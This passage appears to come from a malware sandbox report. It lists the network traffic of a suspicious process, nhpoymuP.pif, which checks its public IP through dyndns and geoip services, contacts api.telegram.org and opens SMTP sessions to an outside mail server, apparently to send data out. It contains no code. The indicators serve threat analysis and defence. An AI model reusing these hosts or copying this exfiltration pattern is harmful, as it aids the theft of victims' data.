Jan 2, 2025 16:05:53.017826080 CET	49773	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:53.024605036 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:53.024683952 CET	49773	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:53.565320015 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:53.565547943 CET	49773	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:53.570322037 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:53.717077017 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:53.717415094 CET	49773	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:53.722191095 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:53.873588085 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:53.878388882 CET	49773	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:53.883233070 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:54.034506083 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:54.034526110 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:54.034535885 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:54.034540892 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:54.034549952 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:54.034560919 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:54.034691095 CET	49773	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:54.034691095 CET	49773	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:54.058670044 CET	49773	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:54.063416004 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:54.208944082 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:54.213531017 CET	49773	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:54.219924927 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:54.363046885 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:54.374795914 CET	49773	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:54.379590034 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:54.521825075 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:54.524745941 CET	49773	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:54.529592037 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:54.673729897 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:54.674134016 CET	49773	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:54.679141045 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:54.820774078 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:54.821018934 CET	49773	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:54.826199055 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:54.968955994 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:54.969188929 CET	49773	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:54.973975897 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:55.117810011 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:55.118010998 CET	49773	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:55.122800112 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:55.268812895 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:55.269074917 CET	49773	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:55.273866892 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:55.441719055 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:55.446985006 CET	49773	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:55.447107077 CET	49773	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:55.447293043 CET	49773	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:55.447336912 CET	49773	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:55.447379112 CET	49773	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:55.639565945 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:55.639578104 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:55.639588118 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:55.639595985 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:55.639605045 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:55.639612913 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:55.639621019 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:55.639625072 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:55.639627934 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:55.639636993 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:56.056241035 CET	587	49773	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:56.099442005 CET	49773	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:58.723421097 CET	49755	80	192.168.2.4	193.122.130.0
Jan 2, 2025 16:05:58.898106098 CET	49799	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:58.902915001 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:58.902976036 CET	49799	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:59.436655045 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:59.436861038 CET	49799	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:59.441662073 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:59.582561970 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:59.582701921 CET	49799	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:59.587549925 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:59.880295038 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:05:59.880793095 CET	49799	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:05:59.885535002 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:00.038327932 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:00.038445950 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:00.038456917 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:00.038501024 CET	49799	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:06:00.038590908 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:00.038602114 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:00.038645029 CET	49799	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:06:00.040899038 CET	49799	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:06:00.045712948 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:00.188599110 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:00.191737890 CET	49799	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:06:00.196540117 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:00.337351084 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:00.339724064 CET	49799	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:06:00.344558954 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:00.491880894 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:00.493005991 CET	49799	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:06:00.497801065 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:00.640260935 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:00.640608072 CET	49799	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:06:00.645371914 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:00.786104918 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:00.786341906 CET	49799	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:06:00.791213036 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:00.933193922 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:00.933522940 CET	49799	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:06:00.938457966 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:01.106239080 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:01.106441975 CET	49799	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:06:01.111274004 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:01.253593922 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:01.253957987 CET	49799	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:06:01.258781910 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:01.417618036 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:01.418199062 CET	49799	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:06:01.418287039 CET	49799	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:06:01.418431044 CET	49799	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:06:01.418431044 CET	49799	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:06:01.418452978 CET	49799	587	192.168.2.4	208.91.198.176
Jan 2, 2025 16:06:01.423064947 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:01.423238039 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:01.423248053 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:01.423418999 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:01.423427105 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:01.423552990 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:01.622636080 CET	587	49799	208.91.198.176	192.168.2.4
Jan 2, 2025 16:06:01.677560091 CET	49799	587	192.168.2.4	208.91.198.176

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 16:04:57.925811052 CET	64272	53	192.168.2.4	1.1.1.1
Jan 2, 2025 16:04:58.220206022 CET	53	64272	1.1.1.1	192.168.2.4
Jan 2, 2025 16:05:03.475996971 CET	58485	53	192.168.2.4	1.1.1.1
Jan 2, 2025 16:05:03.484832048 CET	53	58485	1.1.1.1	192.168.2.4
Jan 2, 2025 16:05:28.845547915 CET	59303	53	192.168.2.4	1.1.1.1
Jan 2, 2025 16:05:28.853368044 CET	53	59303	1.1.1.1	192.168.2.4
Jan 2, 2025 16:05:45.506376982 CET	63158	53	192.168.2.4	1.1.1.1
Jan 2, 2025 16:05:45.512840033 CET	53	63158	1.1.1.1	192.168.2.4
Jan 2, 2025 16:05:52.728921890 CET	50288	53	192.168.2.4	1.1.1.1
Jan 2, 2025 16:05:53.017009020 CET	53	50288	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 2, 2025 16:04:57.925811052 CET	192.168.2.4	1.1.1.1	0xd28c	Standard query (0)	fodoknotel.za.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 16:05:03.475996971 CET	192.168.2.4	1.1.1.1	0x7eec	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 2, 2025 16:05:28.845547915 CET	192.168.2.4	1.1.1.1	0x54c9	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 2, 2025 16:05:45.506376982 CET	192.168.2.4	1.1.1.1	0xfb9e	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 2, 2025 16:05:52.728921890 CET	192.168.2.4	1.1.1.1	0x9f5e	Standard query (0)	mail.techniqueqatar.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 2, 2025 16:04:58.220206022 CET	1.1.1.1	192.168.2.4	0xd28c	No error (0)	fodoknotel.za.com		23.237.26.135	A (IP address)	IN (0x0001)	false
Jan 2, 2025 16:05:03.484832048 CET	1.1.1.1	192.168.2.4	0x7eec	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 2, 2025 16:05:03.484832048 CET	1.1.1.1	192.168.2.4	0x7eec	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 2, 2025 16:05:03.484832048 CET	1.1.1.1	192.168.2.4	0x7eec	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 2, 2025 16:05:03.484832048 CET	1.1.1.1	192.168.2.4	0x7eec	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 2, 2025 16:05:03.484832048 CET	1.1.1.1	192.168.2.4	0x7eec	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 2, 2025 16:05:03.484832048 CET	1.1.1.1	192.168.2.4	0x7eec	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 2, 2025 16:05:28.853368044 CET	1.1.1.1	192.168.2.4	0x54c9	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 2, 2025 16:05:28.853368044 CET	1.1.1.1	192.168.2.4	0x54c9	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 2, 2025 16:05:45.512840033 CET	1.1.1.1	192.168.2.4	0xfb9e	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Jan 2, 2025 16:05:53.017009020 CET	1.1.1.1	192.168.2.4	0x9f5e	No error (0)	mail.techniqueqatar.com		208.91.198.176	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

fodoknotel.za.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	193.122.130.0	80	7416	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 16:05:03.624102116 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 16:05:21.146392107 CET	745	IN	HTTP/1.1 504 Gateway Time-out Date: Thu, 02 Jan 2025 15:05:21 GMT Content-Type: text/html Content-Length: 557 Connection: keep-alive X-Request-ID: 82bb25593c111bcad654e78ad8cd4718 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED] Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49733	193.122.130.0	80	7688	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 16:05:14.921350956 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 16:05:27.603337049 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:27 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2d12329c6d88c374791262271d22fb6d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 2, 2025 16:05:27.610217094 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 2, 2025 16:05:28.155039072 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:28 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0d2e15a98647ca217356c3ce29d22e81 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 2, 2025 16:05:29.538620949 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 2, 2025 16:05:30.994702101 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:30 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5802c0d01f5d54b2e326d23d80f05b15 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	193.122.130.0	80	8008	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 16:05:23.870104074 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 16:05:28.732500076 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:28 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b8378110946084a51aab0558a3be76be Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 2, 2025 16:05:28.775854111 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 2, 2025 16:05:31.858957052 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:31 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: eb96e9873d03edeca95594765ee4fa43 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 2, 2025 16:05:32.792109013 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 2, 2025 16:05:36.021917105 CET	745	IN	HTTP/1.1 504 Gateway Time-out Date: Thu, 02 Jan 2025 15:05:35 GMT Content-Type: text/html Content-Length: 557 Connection: keep-alive X-Request-ID: 53670397fe760e880fb9187da12540df Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED] Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jan 2, 2025 16:05:36.043612957 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 2, 2025 16:05:36.949445009 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 581ed935375aa0868aa1e0d599c0e668 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49743	193.122.130.0	80	7688	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 16:05:31.644198895 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 2, 2025 16:05:33.138668060 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 52ceeb6b4218b260ed4dc0f72e81fb79 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49746	193.122.130.0	80	7688	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 16:05:33.977319002 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 2, 2025 16:05:36.458431959 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2aeb628417726287e4ac67494d09743c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

